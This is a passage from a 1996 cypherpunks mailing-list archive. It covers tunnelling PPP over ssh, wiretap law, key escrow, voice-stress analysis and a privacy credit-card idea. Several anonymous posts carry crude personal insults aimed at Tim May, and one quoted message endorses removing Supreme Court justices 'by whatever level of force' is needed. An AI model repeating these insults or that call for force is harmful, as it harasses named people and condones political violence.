 echo get \$rmtip 192.168.0.1;\
 echo get \$locip 192.168.0.2;\
 echo "mode CSLIP";sleep 15)|/sbin/dip -tv

PPP is a little more complicated; I found it's easier if you put the ssh on
the pty instead of the tty side.  You can't do this from a shell script,
because the pty can only be opened once.  This will take care of that:

main(ac,av)int ac;char **av;{
  int fd;
  fd=open("/dev/tty",O_RDWR);
  ioctl(fd,TIOCNOTTY);
  close(fd);
  fd=open("/dev/ptyqf",O_RDWR);
  if(fd<=0) exit(1);
  dup2(fd,0);
  dup2(fd,1);
  dup2(fd,2);
  execl("/usr/local/bin/ssh","ssh","-l","username","-e","none","-c","idea",
        "-t","remotehost","mesg n;/usr/sbin/ppp -direct mylink",(char *)0);
  exit(1);
}

Do remember that you can't route the ip addresses that you're tunneling
inside the tunnel!  So be sure to assign some alternate ip addresses to
each end of the link.  192.168.x.x will work; those addresses aren't
assigned to anyone.

I used /dev/ttyqf for the tty, that is usually unused.  If you have more
than 30 users online then you'll need to increase it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 7 Oct 1996 03:54:20 +0800
To: cypherpunks@toad.com
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <3257DCF0.6CC0@gte.net>
Message-ID: <7P2DVD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> BTW, the rule for these debates (as all presidential discourse) is:
> "He's lying."
> "How can you tell?"
> "His lips are moving."

Q: How can you tell that Timmy May is posting lies, personal attacks, and
   religious war flame bait?

A: He posts them to cypherpunks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 7 Oct 1996 04:07:40 +0800
To: cypherpunks@toad.com
Subject: David Sternlight knows 1000 times more about cryptograpjy than Timmy May
In-Reply-To: <32574E6F.64F1@sternlight.com>
Message-ID: <q72DVD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Cryptanalysis by David Sternlight:

>From: David Sternlight <david@sternlight.com>
>Newsgroups: phl.food,alt.food.wine,ne.food,rec.food.drink.coffee,rec.arts.fine,rec.food.cooking,austin.food,triangle.dining,la.eats,soc.culture.jewish,chi.eats,memphis.dining,nyc.food
>Subject: Re: 2nd Avenue Kosher Deli is on the Web, and they do mail order! Go to http://www.quicklink.com/~nycdeli/
>Message-ID: <32574E6F.64F1@sternlight.com>
>Date: Sat, 05 Oct 1996 23:15:11 -0700
>References: <01bbb2c8$efc52a60$29a5c0d0@dell-xps-p200s> <5366ac$qtj@news1.panix.com> <slrn55dmhj.4r.jamie@apm5-190.realtime.net>
>Reply-To: david@sternlight.com
>Organization: DSI/USCRPAC
>Lines: 14
>NNTP-Posting-Host: sternlight.com
>Mime-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>
>jamie wrote:
>>
>> On Sat, 05 Oct 1996 19:46:07 GMT, Andrew Mathis <fresh@panix.com> wrote:
>> >Two observations
>> >1) From the most Orthodox standpoint, 2nd Ave. Deli is not Kosher
>> >because they are open on Shabbat.  Many frum Jews I know refuse to eat
>> >there
>>
>> Ah....kosher style, then?
>
>Congregant: "What does "kosher style" mean?
>Rabbi: "Tref".
>
>David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 7 Oct 1996 07:12:09 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
Message-ID: <v02130500ae7d6af0566e@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>A note on _contact analysis_. One thing the FBI probably wants badly are
>databases of who has travelled where, and when, for correlation analysis.
>Note that the crackdown on "valid IDs" for travel, for airlines, helps in
>this regard. I would not be surprised to learn that the airline databases
>are routinely fed to the Feds, so to speak. (Possibly via the FAA, acting
>as a kind of cutout.) Were I the head of the FBI, this is what I would
>want.

The airlines don't yet carefully check IDs (no SSN or DL # retained).  They
merely check that the name on your ID matches the reservation.


>
>The next step will be collecting hotel reservation databases. (Unlike the
>case with the FAA and the airlines, I don't know what kind of authority
>would grant them access to private hotel databases, but I expect they are
>working to find such authority somewhere. Maybe the infinitely malleable
>"regulation of commerce" clause, even if hotel stays are canonically _not_
>interstate trade!)
>
>(They already got access to the credit card databases, decades ago, of course.)
>

Are SSN and other ID required when opening a 'pre-paid' credit card
account?  That is, the ones for persons with poor credit who are required
to maintain a balance sufficient to pay off the charges?  Perhaps we could
put our heads together and determine a way to become franchised by MC/VISA
and offer 'affinity' type accounts with no address requirements (all
statments are sent via remailer/nym email).

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 7 Oct 1996 07:10:31 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Voice Stress Analysis of Debates?
Message-ID: <v02130501ae7d6dde06b2@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


> Jim Bell <jimbell@pacifier.com> wrote:
>One thing I wonder is this:  Can the stress indications be removed from a
>voice-containing signal by some sophisticated DSP processing?  Just look for
>whatever effect that indicates stress, add it in equal and negative amounts
>to eliminate the apparent stress, etc.    It might not make sense for
>anything less "critical" than debates, but if the control of the debates is
>as monopolized as we think it is, it is reasonable to think that debate
>participants would insist on a certain level of control over the audio signal.
>
>
[snip]
>But I would still be interested to get some
>kind of quantitative feedback on the debates.  If anything, the ABSENSE of
>the news media's attempting to use voice-stress analysis is telling.
>

BTW, did anyone notice that some of the evening news anchors are imaged via
a camera/DSP to render as more youthful (e.g., removing facial wrinkles)?




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Mon, 7 Oct 1996 04:19:49 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: NYT Nix GAK
In-Reply-To: <3255C1AA.31EC@gte.net>
Message-ID: <Pine.SUN.3.95.961006141247.22865F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996, Dale Thorn wrote inter alia:
> Now, for those folks who oppose the personal ownership of firearms, or 
> at least "really dangerous" firearms, I'd like to know exactly what's 
> the difference (in principle) between the above "...high-quality 
> encryption widely available so that the private sector can protect 
> itself from criminal or...", and making firearms widely available?

The difference is obvious: crypto does not put holes in people.

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Mon, 7 Oct 1996 04:27:11 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <Pine.SUN.3.94.961006034458.13831A-100000@polaris>
Message-ID: <Pine.SUN.3.95.961006141712.22865G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


For the benefit of recent arrivals on the list who may not be lawyers, let
me assure you there is ample law on the legality of wiretaps.

See generally

http://www.law.miami.edu/~froomkin/articles/clipper.htm


**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**
                  **Age two weeks: 9 lbs 12 oz, 23"**
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 7 Oct 1996 07:35:09 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <3.0b28.32.19961006142521.00700398@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 10/5/96 -0800, Jim Bell wrote:
>At 02:14 PM 10/5/96 -0700, Greg Broiles wrote:
>>At 04:42 PM 10/4/96 -0800, jim bell wrote:
>>>I think it's really very simple.  Wiretaps in the US were illegal until 
>>>1968.
>>
>>Then please explain what the Supreme Court was doing some 40 years prior to
>>1968, in _Olmstead v. US_ 277 U.S. 438 (1928), where the product of a
>>wiretap was held to be admissible because without a physical trespass there
>>was no Fourth amendment violation. (This is no longer good law.) 
>
>Then you ignored the rest of my commentary.  While wiretaps were narrowly 
>held "constitutional" in about 1932, as I vaguely recall, that doesn't mean 
>that they were LEGAL:  On numerous occasions subsequent to 1932,  Congress 
>rejected laws which would have legalized the use of wiretaps.  They were not 
>provided for under law.  Obviously, you could take the position that 
>Congress could have approved of them at any time, as they did in 1968, but 
>apparently it took such approval to _legalize_ them.

Congress doesn't need to explicitly approve the use of new investigatory
tools or techniques. Do you think that cops needed special legislation
before they could use cars, or telephones, or helicopters, or cameras, or
fancier guns, or ..? 

Also, Congress is not the only legislature to think about - the individual
states can (and have) developed their own statutes relating to wiretaps,
law enforcement use of wiretaps, and so forth. (See, e.g. Cal. Penal Code
s. 630 et seq, Oregon Revised Stats. s. 165.540 et seq) 

Also, Congress' intent when it passed Title III in 1968 was not to
"legalize" wiretapping but to standardize it. I quote from Pub.L. 90-351
(1968):

    "On the basis of its own investigations and of published studies,
	the Congress makes the following findings:

	(a) Wire communications are normally conducted through the use of 
	facilities which form part of an interstate network. The same
	facilities are used for interstate and intrastate communications.
	There has been extensive wiretapping carried on without legal 
	sanctions, and without the consent of any of the parties to the
	conversation . . . The contents of these communications and
	evidence derived therefrom are being used by public and private
	parties as evidence in court . . .

	(b) In order to protect effectively the privacy of wire and oral
	communications, to protect the integrity of court and administrative
	proceedings, and to prevent the obstruction of interstate commerce,
	it is necessary for Congress to define on a uniform basis the
	circumstances and conditions under which the interception of wire
	and oral communications may be authorized . . ."

It took me less than ten minutes to find that. You could have taken that
ten minutes instead. It's abundantly clear that you don't give a shit about
the accuracy of what you write. If you're making things up or speculating,
you could at least say something like "I think Congress was probably acting
to legalize previously illegal wiretaps in 1968", so that it's clear that
you're writing on the basis of speculation, not research. It'd also be nice
if you'd add some sort of indication that you're posting about your own
secret version of the law instead of the one that's used in courtrooms, but
I'm going to go ahead and assume that the former is what you mean in the
future.  

>You're ENTIRELY misunderstanding (or misrepresenting) what I'm saying!  I'm 
>well aware that the SC disagrees, but that is simply because they are 
>entirely wrong in this matter.  Why should this surprise you?  Given the 
>rash of 5-4 decisions in the last few years, there can be no illusion that 
>they always come to the right decision.   I don't claim that they agree with 
>me, quite the opposite.  But if anything, their error justifies removing 
>them by whatever level of force turns out to be necessary.

As a matter of Constitutional interpretation, the Supreme Court cannot be
"wrong". You and I can disagree with them, but their interpretation is the
magic one that trumps ours in court. If we're going to try to organize our
lives around a body of writings (e.g., laws) it's not useful for everyone
to make up their own meanings for the laws because if we're all following
different laws, that's more or less the same as having no law at all.
Somebody's interpretation has to be the "right" one; and the United States
is organized and has evolved such that the Supreme Court's is the right one. 
I think it's reasonable for you to say that you don't want to play that
game, but I don't see why you need to pretend that your failure to play the
game has anything to do with law or legal reasoning. 

If what you want is anarchy (and as I understand things, you're arguing
that people should live by their own interpretation of what's right and
wrong, and should kill people who disagree with them, which seems like a
fair although unnecessarily dismal view of anarchy), there's no point in
arguing about the Constitution. 

>> Here's a tip: if you think of a
>>way to interpret the Constitution that would make law enforcement not
>>merely less efficient but effectively impossible, your interpretation will
>>not be adopted, 
>
>Your statement is inadvertently illuminating.  Legal decisions are not 
>supposed to be made by people who have a stake in the outcome.  Here, you 
>are acknowledging that there is no way to expect the current legal system 
>will come to any kind of objective  decision concerning these matters, 
>precisely because they would reject any decision which was seen as
>"mak[ing] 
>law enforcement effectively impossible."  This sounds like a classic 
>conflict-of-interest, huh?  It's not quite the same as receiving a bribe,  
>or falsely convicting an ex-wife's lover of murder, or some sort of purely 
>personal issue.  Nevertheless, it is a conflict of interest.

It's not inadvertent - I meant what I said. The Constitution is a document
for organizing a government. If you're going to interpret it into such a
pretzel-like format that it no longer describes a functional government,
it's much more sensible to just say "I don't want to have a government". If
you do want to have a government, interpretations which prevent it aren't
useful. 

Your hypothetical "conflict of interest" problem seems beside the point; I
don't see how the "can government ever be legitimate?" or "can the
government exist?" or "can the government act to enforce the laws?" sort of
questions which would create a conflict would ever really be up for debate.
There's simply no meaningful argument that the Constitution was intended to
do anything but create a government; and it envisions that the executive
branch will enforce laws that the legislature chooses to enact.

Again, there are certainly other ways to organize human behavior and human
societies. But they don't need to have anything to do with the Constitution. 
In particular, I don't see any reason to try to make anarchy and the
Constitution compatible in some perverted logical universe. 

>And BTW, you vastly overstated your case by suggesting that the rejection of 
>wiretaps would "make law enforcement...effectively impossible."  Before 
>telephones, there were no wiretaps, right?!?  (I won't claim "justice was 
>done," then, but they would have claimed it was...)    And even today, 
>probably 99%+ of cases decided by  courts within the US do not contain any 
>wiretap evidence at all (I invite you to correct me if I'm wrong, here!) so 
>I suggest that it is obvious that even the complete rejection of wiretaps 
>wouldn't "make law enforcement...effectively impossible."  (how could it?)

Sorry. I skipped a step. I see no meaningful distinction between wiretaps
and other searches & seizures. The rule you want to apply to wiretaps
should, if it's a good rule, be applied to all searches & seizures. There's
nothing special about phone calls.

If we're going to give people notice & an opportunity to be heard before
even preliminary steps are taken in a criminal proceeding, very few
prosecutions will get off the ground. (We can either leave people free
pending decisions about searches & arrests, in which case they've got
reason & an opportunity to make themselves scarce or destroy evidence; or
we can lock them up and seize their houses while arguing about
search/arrest warrants, which is also a problem because most of the
evidence about guilt or innocence isn't available yet .. so you're holding
people & property with very little evidence of wrongdoing. And that's not
constitutional or good.)

Also, the premises of your argument were known at the time the Fourth
Amendment was written & adopted. I think that if the writers & adopters had
meant for there to be a pre-search hearing for the target of the search,
they'd have said so.

You and Detweiler seem to be missing the distinction between what's
constitutional and what's useful or possible. I believe that wiretaps are
constitutional (assuming the cops jump through all the right hoops). I
believe that laws which force me to use wiretappable phones in my home or
business are unconstitutional. If many people use unwiretappable phones
then wiretaps will become obsolete. But they will still be constitutional
in their obsolescence. These two approaches "wiretaps are not allowed" and
"wiretaps are allowed but citizens are able to make them ineffective" do
reach a similar result (very few or no wiretaps) but the approach used to
reach the result is meaningfully different. In particular, the second
approach doesn't require a reorganization of search & seizure law. Such a
reorganization is unlikely to occur.

>>and therefore is not useful.
>
>No, actually it's potentially quite useful!  It's just highly embarrassing 
>for anyone who has a strong psychological stake in working entirely within 
>the American legal system.

Your arguments are only "highly embarrassing" to someone who identifies
with the legal system only in that they have enough buzzwords and are
internally consistent (even if based upon fantasy) enough that people with
no meaningful contact with the legal system might mistake you for someone
familiar with it. 

>>It might or might not be
>>theoretically elegant or logically attractive, it will not be adopted. So
>>stop thinking about it. 
>
>Ultimately, I don't think there's even a choice in the matter:  The current 
>system WILL be dropped, possibly directly onto the heads of the people who 
>currently populate it!  Are you going to be part of the solution, or part
>of the problem?

Depends on your perspective.

As this is really no longer even tangentially related to technology or
privacy, I won't post further about it (absent a renewed connection to
technology or privacy, which I don't anticipate). Jim, you and anyone else
who wants it are welcome to the "last word". Please don't interpret my
failure to respond as agreement or endorsement of anything beyond an
attempt to get the list back closer to being on-topic. 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 7 Oct 1996 08:01:26 +0800
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <199610062158.OAA12739@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


There's a rumor that Timmy C. May sells his dead relatives as fertiliser as 
they constitute the best shit in California.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 7 Oct 1996 08:34:05 +0800
To: azur@netcom.com (Steve Schear)
Subject: Re: Voice Stress Analysis of Debates?
Message-ID: <199610062229.PAA06180@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 PM 10/6/96 -0700, Steve Schear wrote:

>BTW, did anyone notice that some of the evening news anchors are imaged via
>a camera/DSP to render as more youthful (e.g., removing facial wrinkles)?

Really?  Where'd you hear this? I suppose it's not beyond the realm of 
possibility, but that would be rather sophisticated programming, 
particularly in real-time.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 7 Oct 1996 07:30:06 +0800
To: Aviel Rubin <rubin@usenix.ORG>
Subject: Re: Paths of trust in PGP
In-Reply-To: <199610051534.IAA13534@usenix.ORG>
Message-ID: <199610062142.QAA05444@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610051534.IAA13534@usenix.ORG>, on 10/05/96 at 08:34 AM,
   Aviel Rubin <rubin@usenix.ORG> said:


>There is a really cool service being offered on the web. It allows
>users to trace the paths of trust between two keys in the PGP world.
>It is worth checking out:

>  http://www.research.att.com/~reiter/PathServer/

>This is a good way to find the paths you want in the web of trust.
>For example, you can type in your key id, and the key id of a new,
>candidate key, and you will find all of the signature paths
>from your key to the new key. You'll be surprized at how connected
>the graph is.

In case anyone is intrested I have added a direct interface to this in my PGP front
end. :)

I also have added a real-time key search & retrevial.

They will be included in the next version which should be out by the end of the month
after I get done working out the kinks.

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 7 Oct 1996 10:06:47 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <3.0b28.32.19961006163919.00700398@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:43 PM 10/5/96 -0700, Detweiler wrote:
>>"Right to choose to be in contempt of court" ?  If only I could attach a
>>sound file with my howling laughter to this post.
>
>I find it as ludicrous as you do, but it's the clear insinuation
>suggested by hard-core cypherpunks / anarchists in this forum.

I wrote something which you might be confusing for this argument; in case
this is what you mean, I've reproduced it below:

[originally sent on 9/18/96]
>There's a world of difference between the government subpoena-ing
something >from me, where I can delay disclosure until I've exhausted my
legal avenues >to challenge disclosure, and the government demanding data
from an at best >disinterested third party who cares not at all if I get my
day in court >before they disclose. With the second scenario, I'm forced to
try to >"unring the bell", and somehow limit the spread of otherwise
>private/confidential data in a community (law enforcement) which is
>organized to collect and retain information. Ha, ha. Given today's
Congress >and Supreme Court, there's probably precious little chance that
keys >disclosed prematurely or erroneously won't be used to collect
evidence >which will be admissible despite the lack of meaningful
opportunity to >challenge the "recovery" of a key.

Also, there is an important difference between making a policy argument or
expressing a preference, e.g.:

"I like having a choice between disclosing information which is requested
and suffering the penalties for contempt of court"

and an argument about the constitution:

"The constitution says I must be given a choice between disclosing and
contempt." 

I don't remember seeing any examples of the latter come across the list. As
I remember things, the context of my statement above was a discussion of
why third-party key escrow is not the same as self-escrow. 

>>Do not make the mistake of thinking there is no case law on wiretap simply
>>because you have not/are too lazy to go to the library and look it up.
>
>I said, "at least it is rarely quoted here", lawyer-boy.

It's rarely quoted here because it is unremarkable; just as the list is not
a place for basic crypto education, it is not a place for basic legal
education. It's difficult to come up with a good summary of legal issues or
subjects which is readable by lay people and short and accurate (esp. given
that it will be interpreted by lay people in potentially 51 domestic
jurisdictions, plus foreign folks).

Good, fast, cheap, pick any two. 

As Brian Davis and Uni have pointed out, people who keep current enough on
legal topics to be able to give you a good answer will probably want to get
paid for doing so. Saying "here's a legal argument that I made up in the
shower. what do you guys think of it?" and expecting a detailed explanation
of why it's good or bad is the same as saying "here's my new crypto
algorithm that I thought of in the shower, what do you guys think of it?". 

>>You propose to refight a case soundly resolved ages ago and you propose to
>>get the rest of the list to do your homework for you.
>
>nevertheless, you might not come off as so utterly condescending
>and self-pretentious if you gave even the slightest smidgeon
>of a reference yourself, instead of preferring to insult a poster.

Merely asking the question "Is there case law on wiretaps?" suggests that
an answer which includes references will be wasted on you. It will probably
be wasted because your level of interest doesn't seem to have spurred you
to darken the doorstep of a library or bookstore yet; so an answer which
requires you to do so seems unhelpful. It will also probably be wasted
because if you don't already know that there's caselaw about it you
probably don't have enough legal background to place whatever new
information you might get from those references in a useful conceptual
framework. 

But perhaps my speculation is wrong and you are prepared to follow up
meaningfully on references, so ..

Go to a law library or larger general library and ask the librarian to show
you where the annotated copy of 18 USC 2510 is. Read the statute. Read the
legislative history. Read the annotations. Read the cases which were
annotated. Repeat this process until you reach 18 USC 2709 or die of boredom.

Ask the librarian to help you find LaFave's treatises on search & seizure.
Read them.

(The answer to most of the "how do I find out about 'X'?" questions is to
make friends with a librarian who doesn't mind helping you out, just like
with research questions in other fields you may not be familiar with. But
surely it's not possible to get much beyond the age of 12 or so and not
know that ..?)

Try "Understanding Criminal Procedure" by Dressler (Matthew Bender, 1991),
and "Criminal Law" by LaFave & Scott (West). 

(For extra credit, ask for the USCA/USCS annotated copy of the Fourth
Amendment, and read those annotations and cases.)

If there's a law school near you, you might go to the school's bookstore
and look for books in the "Nutshell" series, or the "Emanuel's" series, or
the hardbound hornbooks. These books are mostly used by law students to get
an overview of a particular area of the law. They are not especially
detailed nor up-to-the-minute current but usually aren't totally wrong.
They also don't usually touch on a particular state's law, but discuss
either federal law or an amalgam of state law, so they aren't good for
solving a particular concrete problem. But they will help you figure out
that, e.g., wiretaps have been legal for at least 60-70 years.

Now that you've got some references to work with, please write back and
tell us what you learned. 

(Dorothy Denning & others have written a summary of wiretap procedure which
I don't have time/energy to check for correctness - but it's at 
<http://www.cpsr.org/cpsr/privacy/communications/wiretap/denning_wiretap_pro
cedure_paper.txt>. EFF and CPSR both seem to have some wiretap/privacy
materials available.)

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Mon, 7 Oct 1996 07:17:55 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: FUCK!!!!!!;-)
Message-ID: <1.5.4.32.19961006211128.00681700@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 AM 10/6/96 -0700, Declan McCullagh wrote:
>Will is hardly a "media monopoly" representive, or someone who spits out 
>"ADS as news."
>
>If his longtime reading of the cypherpunks mailing list wasn't a good 
>enough clue, you may remember that Will broke the Clipper III story 
>earlier this year.
>
>And yes, I am a card-carrying member of the media -- and a fan of Will's 
>writing.
>
>-Declan
>
>HotWired
>Washington, DC
>

Thanks, Declan. You've helped restore my faith in fellow journalists. I'm
touched.

Cheers.

Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mthompso@qualcomm.com
Date: Mon, 7 Oct 1996 10:55:39 +0800
To: undisclosed-recipients:;
Subject: No Subject
Message-ID: <2.2.32.19961006223102.009ba138@strange.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Conon sequiter. Crack cocaine doesn't put holes in people either. 

-m
Michelle Thompson, World Tour 1996!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Mon, 7 Oct 1996 08:32:31 +0800
To: cypherpunks@toad.com
Subject: [CRYPTO] Secure envelopes
Message-ID: <199610062134.RAA08346@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Many forgeries are traceable with mathematical 
certainty to feebleminded Timothy May poison keyboard.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 7 Oct 1996 10:25:22 +0800
To: cypherpunks@toad.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <v02130500ae7d6af0566e@[10.0.2.15]>
Message-ID: <v03007801ae7e0e0e4b57@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:05 PM -0700 10/6/96, Steve Schear wrote:
(quoting me)

>>(They already got access to the credit card databases, decades ago, of
>>course.)
>>
>
>Are SSN and other ID required when opening a 'pre-paid' credit card
>account?  That is, the ones for persons with poor credit who are required
>to maintain a balance sufficient to pay off the charges?  Perhaps we could
>put our heads together and determine a way to become franchised by MC/VISA
>and offer 'affinity' type accounts with no address requirements (all
>statments are sent via remailer/nym email).

A couple of people on this list talked about a similar thing, a "Privacy
Card," with the explicit policy of not reporting transactions in detail to
the Big Three (the government-friendly TRW Credit, Equifax, and Transunion).

The idea being that if a "market for privacy" exists, someone ought to be
able to make a nice piece of change offering a card that protects privacy.

One problem is that many people _want_ credit card transactions reported to
the Big Three, to build up their credit record.

(But many don't care. I've been using a VISA card issued by my stock broker
for 12 years now. It's a "debit card," though it's handled by a merchant
exactly as a credit card, and they probably can't see any difference. What
I gathered when buying my current house, is that none of these transactions
were part of my "credit history," as I was actually using a debit card. All
of those now using, or planning to use, a debit card would be ideal
candidates for a "Privacy Card.")

Such a deal would have to be one of Visa, MasterCard, or Discover, with
American Express a distant fourth. (I don't even know if these
companies/tradenames would even allow such a thing, of course.) The cost of
rolling out a brand new type of card would of course be prohibitively high.

(I have no expectation than this will be done, and I think I said so at the
time. Ever the realist, in some ways,  I knew no one would take on such a
complex project. Just as no one followed through with the "Cypherpunks
Credit Union" idea, discussed at several meetings in 1993.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 7 Oct 1996 03:44:24 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: RSA's Official Permission
In-Reply-To: <199610060521.WAA10181@dfw-ix1.ix.netcom.com>
Message-ID: <Pine.LNX.3.94.961006174647.569A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 5 Oct 1996, Bill Stewart wrote:

> >   REDWOOD CITY, Calif.---Oct. 2nd, 1996--RSA Data Security, Inc., a
> >   wholly-owned subsidiary of Security Dynamics Technologies, Inc.
> >   (NASDAQ: SDTI), issued the following comments on the administration's
> >   recent announcement of a Key Recovery Initiative:
>         [rave reviews deleted....]
> 
> I wonder how much being bought by SDT has influenced their positions?
> 

presumably a very large amount, I seriously doubt if R, S, and A like
supporting GAK.

 --Deviant
Talking much about oneself can also be a means to conceal oneself.
		-- Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 7 Oct 1996 08:01:07 +0800
To: cypherpunks@toad.com
Subject: Geo-politics and Ant Warfare [rant]
Message-ID: <v0300780eae7ddb704366@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Ian Grigg <iang@systemics.com>
Precedence: Bulk
Date: Sun, 6 Oct 1996 23:45:29 +0200
From: Ian Grigg <iang@systemics.com>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Geo-politics and Ant Warfare [rant]

Geo-politics and Ant Warfare

It is interesting to see the debate that is going on within the central
banking community.  Compare these two statements.  Hans Tietmeyer urges
central bank control:

	FRANKFURT, Oct 3 (Reuter) - Bundesbank President Hans Tietmeyer
	said on Thursday a new government policy to give only banks the
	right to issue pre-paid cards, or ``electronic purses'', should
	also be applied to Internet network money.

whilst Alan Greenspan urges free market development:

	In conclusion, electronic money is likely to spread only gradually
	and play a much smaller role in our economy than private currency
	did historically. Nonetheless, the earlier [free banking] period
